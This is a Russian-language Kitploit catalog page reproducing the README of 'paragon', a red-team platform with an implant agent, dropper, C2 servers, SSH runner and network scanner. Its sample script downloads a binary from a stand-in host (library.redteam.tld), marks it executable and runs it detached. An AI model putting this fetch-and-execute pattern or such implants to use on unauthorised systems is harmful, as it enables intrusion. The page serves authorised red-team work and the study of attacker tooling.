Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
paragon — Платформа для взаимодействия Red Team, нацеленная на объединение инструментов атаки под простым пользовательским интерфейсом. | Kitploit
Инструменты/GitHubGitHub/kcarretto/paragon
Фреймворки для пентестаФреймворки для эксплойтовСкриптинг и автоматизацияПост-эксплуатацияКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubkcarretto/paragon

paragon

Платформа для взаимодействия Red Team, нацеленная на объединение инструментов атаки под простым пользовательским интерфейсом.

Репозиторий
30442192 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уведомление о прекращении поддержки

Этот проект прекратил поддержку. Пожалуйста, обратитесь к нашему новому проекту Realm, который основан на многих идеях, заложенных при создании этого репозитория.

CI Build Status Go Report Card Coverage Status GitHub release GoDoc

Paragon

Demo

Paragon — это платформа для проведения Red Team-операций. Она объединяет offensive-инструменты за простым интерфейсом, абстрагируя большую часть серверной работы, чтобы операторы могли сосредоточиться на написании имплантов и тратить меньше времени на базы данных и CSS. Репозиторий также включает несколько offensive-инструментов, уже интегрированных с Paragon, которые можно использовать во время операций.

Этот репозиторий всё ещё находится в стадии активной разработки и не готов к использованию в production. Когда он будет признан стабильным, будет выпущен тег V1.0.0. До этого момента API может претерпевать критические изменения, так как мы постоянно упрощаем наш дизайн. Пожалуйста, ознакомьтесь с документацией для разработчиков ниже, если хотите помочь нам быстрее достичь этого этапа.

Содержание

  • Основные возможности
  • Начало работы
  • Обзор компонентов
  • Часто задаваемые вопросы
  • Терминология
  • Руководство разработчика

Основные возможности

  • Легкая интеграция пользовательских инструментов для объединения операций за единым интерфейсом
  • Запрос графа знаний Red Team через предоставленное GraphQL API
  • Генерация событий для низколатентной автоматизации и обработки в реальном времени
  • Скриптовый язык в стиле Python для развертывания, пост-эксплуатации и многого другого
  • Включены кроссплатформенные импланты и инструменты развертывания
  • Запись действий оператора для удобного агрегирования в отчет по итогам операции

Начало работы

Для быстрого запуска демонстрационного экземпляра клонируйте репозиторий и выполните docker-compose up. Откройте 127.0.0.1:80 в браузере, чтобы начать!

Используемые образы доступны на docker-hub и могут быть настроены из файла docker-compose для production-развертывания.

Обзор компонентов

Скриптовый язык

Большинство компонентов в этом репозитории используют скриптовый язык в стиле Python, обеспечивающий гибкое управление и настройку их поведения. Язык представляет собой модифицированную версию starlark от Google, расширенную кроссплатформенными функциями для операторов. Это также позволяет таким инструментам, как агент и дроппер (описаны ниже), выполнять задачи без использования системных бинарников (curl, bash и т.д.). Все операции выполняются как код на Golang, поэтому добавлять новые функции в среду скриптов интуитивно понятно. Вот пример скрипта:

# Download a file via https, execute it, and don't keep it as a child process.
load("sys", "request")

new_bin = "/tmp/kqwncWECaaV"
request("https://library.redteam.tld", writeToFile=new_bin)

# set new_bin permissions to 0755
chmod(new_bin, ownerRead=True, ownerWrite=True, ownerExec=True, groupRead=True, groupExec=True, worldRead=True, worldExec=True)
exec(new_bin, disown=True)

Справочная информация

Teamserver

Предоставляет простое веб-приложение и GraphQL API для взаимодействия с графом знаний Red Team, объединяя инструменты за единым источником истины и абстрагируя множество рутинных серверных задач. Интегрируйте свои инструменты с Teamserver (через GraphQL API или подписки на события), чтобы сэкономить время на серверной части. Teamserver записывает все действия, поэтому, когда все ваши инструменты объединены в одном месте, составление отчетов по итогам операции становится значительно проще.

Встроенные инструменты

Нижеперечисленные инструменты также включены в репозиторий. Их легко расширить для различных кроссплатформенных сценариев использования.

Дроппер

  • Полностью кроссплатформенный
  • Статическая компиляция ресурсов в единый бинарник
  • Предоставляет скриптовый язык в стиле Python для настройки пользовательского развертывания

Paragon предоставляет инструмент для упаковки ресурсов (бинарников, скриптов и т.д.) в один бинарник, который при выполнении запускает ваш пользовательский скрипт развертывания. Скрипт может записывать ресурсы в файловую систему, запускать процессы, скачивать файлы, обрабатывать ошибки и многое другое. Инструмент полностью кроссплатформенный и статически скомпилирован, обеспечивая надежное развертывание. Если вы хотите расширить его функциональность, просто расширьте сгенерированный файл Golang перед компиляцией.

Агент

  • Полностью кроссплатформенный
  • Предоставляет скриптовый язык в стиле Python для пост-эксплуатации
  • Модульные механизмы связи — компилируйте только то, что нужно
    • Используйте несколько вариантов для надежных обратных вызовов
  • Настройка обработки сбоев связи

Имплант, который выполняет задачи и сообщает о результатах. По умолчанию он настроен на выполнение задач с использованием скриптового языка Paragon в стиле Python и связь с C2 через http(s). Написан на Go, может быть быстро модифицирован для добавления новых методов передачи (например, DNS), вариантов выполнения, логики отказоустойчивости и т.д.

C2

  • Легкое развертывание
  • Высокая производительность, способность обрабатывать тысячи агентов
    • Зависит от системных ресурсов и доступной пропускной способности
  • Распределенная служба — используйте столько C2, сколько хотите

Выступает в качестве посредника между агентом и Teamserver. Обрабатывает обратные вызовы агентов для различных механизмов связи и предоставляет им новые задачи из очереди Teamserver.

Runner (Исполнитель)

  • Низкая задержка, выполнение задач в реальном времени
  • Легко расширяется для поддержки дополнительных механизмов связи
  • Распределенная служба — используйте столько runner'ов, сколько хотите

Вместо ожидания обратного вызова некоторые ситуации могут потребовать прямого соединения для быстрого выполнения задачи и просмотра результата. Runner реализует это, подписываясь на очереди задач и устанавливая соединение с целевой машиной (например, через SSH). Это позволяет интеграциям в стиле оболочки использовать тот же интерфейс, что и импланты и C2. Также позволяет проводить первоначальное развертывание имплантов через этот интерфейс.

Сканер

  • Мониторинг доступных целевых сервисов
  • Автоматизация действий при (не)доступности сервисов
  • Предоставление сетевой информации графу знаний, которая может использоваться другими инструментами
  • Распределенная служба — используйте столько сканеров, сколько хотите

Мониторинг сетевой активности целей и видимых сервисов. Построение графа сети операции и запуск автоматизации при изменении состояния (например, SSH становится доступным).

Часто задаваемые вопросы

Что делать, если машины сообщают один и тот же UUID?

Установка переменной окружения PG_KS_MachineUUID для killswitch Teamserver отключит поиск по машине UUID.

Терминология

Для обеспечения четкого понимания сложных систем ниже приведены несколько специфичных для проекта терминов, которые будут использоваться в документации.

Скачать инструмент